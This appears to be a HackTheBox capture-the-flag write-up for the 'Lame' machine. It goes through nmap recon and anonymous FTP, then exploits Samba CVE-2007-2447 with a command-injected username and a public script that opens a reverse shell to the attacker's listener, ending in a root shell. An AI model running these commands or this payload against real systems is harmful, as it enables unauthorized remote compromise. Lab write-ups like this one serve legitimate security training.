Contents

🕵 HTB-Writeup : LAME

Recon

Port and service detection with nmap : nmap -A 10.10.10.3 -Pn

We retieve these informations :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

Let’s try to connect as anonymous on port 21 (FTP):

1
2
3
4
5
6
7
8
9
ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:steels): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

We get errors when trying to use basic commands such as ls, we add -p to use the ftp passive mode.

There isn’t any directory or file on the ftp server but we can see that the vsFTPd version used is vulnerable to RCE using a backdoor on port 6200. This exploit can be used against the server : https://www.exploit-db.com/exploits/49757

The exploit doesn’t work on the machine, since nothing is running on port 6200.

Let’s explore the port 445, SMB server.

We try to connect with smbclient bu we get an error : protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

We just have to change the client minimal protocol in /etc/samba/smb.conf with NT1.

We try again with smbclient :

1
2
3
4
5
6
7
8
9
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Nothing really interesting, we can check for known vulnerabilities on samba 3.X.

Exploitation

In theory, our SMB server is vulnerable to CVE-2007-2447. We can execute arbitrary code by injecting commands in the username when connecting : -U "/=`nohup mkdir /tmp/foo`" We’re going to use this script to gain a revshell : https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py

1
2
3
4
$ python3 usermap_script.py 10.10.10.3 445 10.10.16.6 4321
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

Netcat side :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 $ nc -nvlp 4321
Listening on 0.0.0.0 4321
Connection received on 10.10.10.3 59071
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

Post-exploitation

We can upgrade our shell thanks to python and it’s import module : python -c 'import pty; pty.spawn("/bin/bash")'

1
2
root@lame:/$ id
uid=0(root) gid=0(root) groups=0(root)

We can now retieve the user flag and the root one.

Tags

Easy, Internal, Network, SAMBA, Penetration Tester Level 1, Remote Code Execution, CVE-2007-2447, Public Vulnerabilities, CVE Exploitation, Security Tools